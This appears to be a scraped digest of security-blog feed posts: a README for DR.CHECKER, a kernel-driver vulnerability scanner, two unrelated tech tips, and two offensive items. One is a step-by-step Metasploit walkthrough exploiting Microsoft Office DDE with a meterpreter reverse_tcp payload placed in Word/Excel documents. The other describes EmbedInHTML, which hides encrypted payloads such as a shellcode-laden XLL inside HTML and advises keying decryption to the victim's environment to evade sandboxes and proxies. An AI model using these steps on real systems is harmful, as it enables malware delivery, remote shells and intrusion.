DR.CHECKER – A Soundy Vulnerability Detection Tool for Linux Kernel Drivers

DR.CHECKER: A Soundy Vulnerability Detection Tool for Linux Kernel Drivers

Tested on Ubuntu >= 14.04.5 LTS

1. Setup

The implementation is based on LLVM, specifically LLVM 3.8. We also need tools like c2xml to parse headers.

First, make sure that you have libxml (required for c2xml):

sudo apt-get install libxml2-dev

Next, we have created a single script which downloads and builds all the required tools.

cd helper_scripts
python setup_drchecker.py --help

usage: setup_drchecker.py [-h] [-b TARGET_BRANCH] [-o OUTPUT_FOLDER]

optional arguments:
-h, --help          show this help message and exit
-b TARGET_BRANCH    Branch (i.e. version) of the LLVM to setup. Default: release_38 e.g., release_38
-o OUTPUT_FOLDER    Folder where everything needs to be setup.

Example:

python setup_drchecker.py -o drchecker_deps

To complete the setup you also need to modify your local PATH environment variable. The setup script will print the exact changes you need to make.

2. Building

This depends on the successful completion of Setup. We have a single script that builds everything, you are welcome.

cd llvm_analysis
./build.sh

3. Running

This depends on the successful completion of Build. To run DR.CHECKER on kernel drivers, we need to first convert them into LLVM bitcode.

3.1 Building the kernel

First, we need a buildable kernel, which means you should be able to compile the kernel using the regular build setup, i.e., make. We first capture the output of the make command; from this output we extract the exact compilation commands.

3.1.1 Generating the output of make (makeout.txt)

Just pass V=1 and redirect the output to a file. Example:

make V=1 O=out ARCH=arm64 > makeout.txt 2>&1

NOTE: DO NOT USE MULTIPLE PROCESSES, i.e., -j. Running in multi-process mode will garble the output file, as multiple processes write to it at the same time.

That's it. DR.CHECKER will take care of things from here.

3.2 Running the DR.CHECKER analysis

There are several steps to run the DR.CHECKER analysis; all of them are wrapped in a single script: helper_scripts/runner_scripts/run_all.py

How to run:

python run_all.py --help

usage: run_all.py [-h] [-l LLVM_BC_OUT] [-a CHIPSET_NUM] [-m MAKEOUT] [-g COMPILER_NAME] [-n ARCH_NUM] [-o OUT] [-k KERNEL_SRC_DIR] [-skb] [-skl] [-skp] [-ske] [-ski] [-f SOUNDY_ANALYSIS_OUT]

optional arguments:
-h, --help              show this help message and exit
-l LLVM_BC_OUT          Destination directory where all the generated bitcode files should be stored.
-a CHIPSET_NUM          Chipset number. Valid chipset numbers are: 1(mediatek)|2(qualcomm)|3(huawei)|4(samsung)
-m MAKEOUT              Path to the makeout.txt file.
-g COMPILER_NAME        Name of the compiler used in the makeout.txt. This is needed to filter out compilation commands. Ex: aarch64-linux-android-gcc
-n ARCH_NUM             Destination architecture, 32 bit (1) or 64 bit (2).
-o OUT                  Path to the out folder. This is the folder which could be used as output directory during compiling some kernels. (Note: not all kernels need a separate out folder)
-k KERNEL_SRC_DIR       Base directory of the kernel sources.
-skb                    Skip LLVM Build (default: not skipped).
-skl                    Skip Dr Linker (default: not skipped).
-skp                    Skip Parsing Headers (default: not skipped).
-ske                    Skip Entry point identification (default: not skipped).
-ski                    Skip Soundy Analysis (default: not skipped).
-f SOUNDY_ANALYSIS_OUT  Path to the output folder where the soundy analysis output should be stored.

The script builds, links and runs DR.CHECKER on all the drivers, and as such might take considerable time (45 min-90 min). If you want to run DR.CHECKER manually on individual drivers, refer to the standalone instructions.

The above script performs the following tasks in multiprocessor mode to make use of all CPU cores:

3.2.1 LLVM Build

Enabled by default. All the bitcode files generated will be placed in the folder provided to the argument -l. This step takes considerable time, depending on the number of cores you have. So, if you have already done this step, you can skip it by passing -skb.

3.2.2 Linking all driver bitcode files into a consolidated bitcode file

Enabled by default. This step performs linking: it goes through all the bitcode files, identifies the related bitcode files that need to be linked, and links them (using llvm-link) into a consolidated bitcode file (which will be stored alongside the corresponding bitcode file). Similar to the above step, you can skip this step by passing -skl.

3.2.3 Parsing headers to identify entry function fields

Enabled by default. This step looks for the entry point declarations in the header files and stores their configuration in the file hdr_file_config.txt under the LLVM build directory. To skip: -skp

3.2.4 Identify entry points in all the consolidated bitcode files

Enabled by default. This step identifies all the entry points across all the driver consolidated bitcode files. The output will be stored in the file entry_point_out.txt under the LLVM build directory.

Example of the contents of the file entry_point_out.txt:

FileRead:hidraw_read:/home/drchecker/33.2.A.3.123/llvm_bc_out/drivers/hid/llvm_link_final/final_to_check.bc
FileWrite:hidraw_write:/home/drchecker/33.2.A.3.123/llvm_bc_out/drivers/hid/llvm_link_final/final_to_check.bc
IOCTL:hidraw_ioctl:/home/drchecker/33.2.A.3.123/llvm_bc_out/drivers/hid/llvm_link_final/final_to_check.bc

To skip: -ske

3.2.5 Run Soundy Analysis on all the identified entry points

Enabled by default. This step will run DR.CHECKER on all the entry points in the file entry_point_out.txt. The output for each entry point will be stored in the folder provided for option -f. To skip: -ski

3.2.6 Example

Now, we will show an example from the point where you have kernel sources to the point of getting vulnerability warnings. We have uploaded a mediatek kernel, 33.2.A.3.123.tar.bz2. First download and extract the above file. Let's say you extracted it in a folder called ~/mediatek_kernel.

3.2.6.1 Building

cd ~/mediatek_kernel
source ./env.sh
cd kernel-3.18
# the following step may not be needed depending on the kernel
mkdir out
make O=out ARCH=arm64 tubads_defconfig
# the following command copies all the compilation commands to makeout.txt
make V=1 -j8 O=out ARCH=arm64 > makeout.txt 2>&1

3.2.6.2 Running DR.CHECKER

cd /helper_scripts/runner_scripts
python run_all.py -l ~/mediatek_kernel/llvm_bitcode_out -a 1 -m ~/mediatek_kernel/kernel-3.18/makeout.txt -g aarch64-linux-android-gcc -n 2 -o ~/mediatek_kernel/kernel-3.18/out -k ~/mediatek_kernel/kernel-3.18 -f ~/mediatek_kernel/dr_checker_out

The above command takes quite some time (30 min - 1 hr).

3.2.6.3 Understanding the output

First, all the analysis results will be in the folder ~/mediatek_kernel/dr_checker_out (the argument given to the option -f); for each entry point a .json file will be created which contains all the warnings in JSON format. These JSON files contain warnings organized by context.

Second, the folder ~/mediatek_kernel/dr_checker_out/instr_warnings (w.r.t. the argument given to the option -f) contains warnings organized by instruction location. These warnings can be analyzed using our Visualizer.

Finally, a summary of all the warnings for each entry point, organized by type, will be written to the output CSV file ~/mediatek_kernel/dr_checker_out/warnings_stats.csv (w.r.t. the argument given to the option -f).

3.2.7 Things to note

3.2.7.1 Value for option -g

To provide a value for option -g you need to know the name of the *-gcc binary used to compile the kernel. An easy way to find this is to grep for gcc in makeout.txt; you will see compiler commands from which you can read the *-gcc binary name. For our example above, if you do grep gcc makeout.txt for the example build, you will see lots of lines like the one below:

aarch64-linux-android-gcc -Wp,-MD,fs/jbd2/.transaction.o.d -nostdinc -isystem …

So, the value for -g should be aarch64-linux-android-gcc. If the kernel to be built is 32-bit then the binary most likely will be arm-eabi-gcc.

3.2.7.2 Value for option -a

Depending on the chipset type, you need to provide the corresponding number.

3.2.7.3 Value for option -o

This is the path of the folder provided to the option O= for the make command during the kernel build. Not all kernels need a separate out path. You may build the kernel without providing an option O, in which case you SHOULD NOT provide a value for that option while running run_all.py.

3.3 Visualizing DR.CHECKER results

We provide a web-based UI to view all the warnings. Please refer to Visualization.

3.6 Disabling vulnerability checkers

You can disable one or more vulnerability checkers by uncommenting the corresponding #define DISABLE_* lines in BugDetectorDriver.cpp.

3.5 Post-processing DR.CHECKER results

To your liking, we also provide a script to post-process the results. Check it out.

Have fun!!

Download DR.CHECKER
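As an added example (not part of DR.CHECKER's own helper scripts), the following Python parses the two plain-text inputs the runner described above depends on: the compile lines in makeout.txt, from which the -g compiler name and the per-file compilation commands are recovered, and the TYPE:function:bitcode lines of entry_point_out.txt. The makeout.txt excerpt is constructed; the entry_point_out.txt lines are the ones quoted in the README.

```python
import re
from collections import Counter

# Constructed makeout.txt excerpt (not from a real build); the first compile
# line mirrors the one quoted in the README's note on the -g option.
MAKEOUT_SAMPLE = """\
  aarch64-linux-android-gcc -Wp,-MD,fs/jbd2/.transaction.o.d -nostdinc -c -o fs/jbd2/transaction.o /home/drchecker/kernel-3.18/fs/jbd2/transaction.c
  aarch64-linux-android-gcc -Wp,-MD,drivers/hid/.hidraw.o.d -nostdinc -c -o drivers/hid/hidraw.o /home/drchecker/kernel-3.18/drivers/hid/hidraw.c
  aarch64-linux-android-ld -EL -r -o drivers/hid/built-in.o drivers/hid/hidraw.o
"""

# Lines exactly as shown in the README for entry_point_out.txt.
ENTRY_POINT_SAMPLE = """\
FileRead:hidraw_read:/home/drchecker/33.2.A.3.123/llvm_bc_out/drivers/hid/llvm_link_final/final_to_check.bc
FileWrite:hidraw_write:/home/drchecker/33.2.A.3.123/llvm_bc_out/drivers/hid/llvm_link_final/final_to_check.bc
IOCTL:hidraw_ioctl:/home/drchecker/33.2.A.3.123/llvm_bc_out/drivers/hid/llvm_link_final/final_to_check.bc
"""

def guess_compiler(makeout_text):
    """Return the most common *-gcc binary name at the start of a make line (the -g value)."""
    names = re.findall(r"(?m)^[ \t]*(\S*gcc)\s", makeout_text)
    return Counter(names).most_common(1)[0][0] if names else None

def compile_commands(makeout_text, compiler):
    """Return (command, source_file) for each real compilation: starts with `compiler`, has -c and a .c input."""
    found = []
    for line in makeout_text.splitlines():
        line = line.strip()
        if not line.startswith(compiler + " ") or " -c " not in line:
            continue  # link steps (ld) and other tools are not compilations
        sources = [tok for tok in line.split() if tok.endswith(".c")]
        if sources:
            found.append((line, sources[-1]))
    return found

def parse_entry_points(text):
    """Parse entry_point_out.txt lines of the form TYPE:function:bitcode_path."""
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        kind, func, bc_path = line.split(":", 2)  # split only twice so the path stays whole
        entries.append({"type": kind, "function": func, "bitcode": bc_path})
    return entries

if __name__ == "__main__":
    gcc = guess_compiler(MAKEOUT_SAMPLE)
    print(gcc, compile_commands(MAKEOUT_SAMPLE, gcc))
    print(parse_entry_points(ENTRY_POINT_SAMPLE))
```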

Link: http://feedproxy.google.com/~r/PentestTools/~3/0Ij2GhMAwEc/drchecker-soundy-vulnerability.html

Exploit Microsoft Office DDE Command Execution Vulnerability

Download module
wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb
Move module into framework
mv dde_delivery.rb /usr/share/metasploit-framework/modules/exploits/windows/
Open Metasploit and load exploit
msfconsole
reload_all
use exploit/windows/dde_delivery
Set the server host
set SRVHOST
Choose payload and run it
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST
set LPORT 443
exploit
Copy paste the code into any word/excel document. Open Word/Excel. Create a new …

Link: http://securityblog.gr/4478/exploit-microsoft-office-dde-command-execution-vulnerability/

How to Stop Autoplay Videos in Chrome

Autoplay videos are now on most of the big websites. Facebook even uses it in its mobile app. Recently a report claimed that Google was testing autoplay ads on search results. Auto-playing videos on the web are one of the most annoying things. Think of when you are silently browsing the web in a public place […]
The post How to Stop Autoplay Videos in Chrome appeared first on UseThisTip.

Link: http://feedproxy.google.com/~r/blogspot/csAFg/~3/cuS6Cjy436s/stop-autoplay-video-chrome.html

Content Delivery Network – Taking your business ahead

To accelerate content delivery, we must ensure that the data source is near the end users. Minimizing distance helps to improve the speed of websites, giving a better user experience and more business opportunities. A CDN, or Content Delivery Network, is designed to alleviate latency by making content quickly available to the end users. For instance, suppose you have content on servers located in the UK and are targeting users in Asia. There will definitely be a certain amount of latency on the way due to the distance. But if that content is available on servers placed in Asia, the delivery would be relatively
The post Content Delivery Network – Taking your business ahead appeared first on CrazyLearner.

Link: http://crazylearner.org/content-delivery-network-taking-business-ahead/

EmbedInHTML – Embed and hide any file in an HTML file

What this tool does is take a file (any type of file), encrypt it, and embed it into an HTML file as a resource, along with an automatic download routine simulating a user clicking on the embedded resource. Then, when the user browses the HTML file, the embedded file is decrypted on the fly, saved in a temporary folder, and presented to the user as if it were being downloaded from the remote site. Depending on the user's browser and the file type presented, the file can be automatically opened by the browser.

This tool comes in two flavors, providing the same overall functionality but with some slight changes in the way of using it:

A Python script which generates the output HTML file based on a template, using RC4 encryption routines, and embedding the decryption key within the output file. The resulting HTML can either be browsed by the targeted user or sent as an attachment.

An HTML/JavaScript page into which you drag the file to be encrypted, which generates the output HTML file using the WebCrypto API but NOT embedding the decryption material (key and counter). Instead, the decryption material is displayed as a set of URL parameters to be added to a URL pointing to the resulting HTML file: http(s)://hosting.server.com/result.html#hexencodedkey!hexencodedcounter. So the resulting HTML file cannot be sent as an attachment.

The main advantage of this technique is that the decryption material is not embedded into the file itself, hence preventing analysis and even retrieval of the payload by any system which doesn't have the full URL (e.g., an intercepting proxy).

Side notes:
This tool was inspired by and derived from the great 'demiguise' tool: https://github.com/nccgroup/demiguise
The b64AndRC4 function used on the binary input (from the XLL file) is a mix of: https://gist.github.com/borismus/1032746 and https://gist.github.com/farhadi/2185197
Check https://gist.github.com/Arno0x/f71a9db515ddea686ccdd77666bebbaa for an easy malicious XLL creation, which is a perfect example of a malicious document one could try to deliver with this method.
In the HTML template (html.tpl file) it is advised to insert your own key environmental derivation function in place of the 'keyFunction'. You should derive your key from the environment so that it only works on your intended target (and not in a sandbox).

Usage
A few payload example files are provided in the payloads_examples directory. For instance, calc.xll is an Excel add-in (XLL) file that contains a metasploit shellcode for x86 processes to launch the calc.exe process.

Using the python script
1/ Generate the malicious html file from the XLL file, along with a secret key:
python embedInHTML.py -k mysecretkey -f example_calc.xll -o index.html
2/ Expose the html file on a web server (one can optionally be started for you with the -w flag)

Using the HTML/Javascript
1/ Open the embedInHTML.html file within a browser
2/ Simply drag the payload file into the page (you can optionally change the output file name)
3/ Save the resulting file and take note of the decryption material as URL parameters to be added to the file name in the form: http(s)://hosting.server.com/result.html#hexencodedkey!hexencodedcounter

Eventually...
Point the target's browser to the html file and let the magic happen:

Download EmbedInHTML

Link: http://feedproxy.google.com/~r/PentestTools/~3/_GxGs0UmT6k/embedinhtml-embed-and-hide-any-file-in.html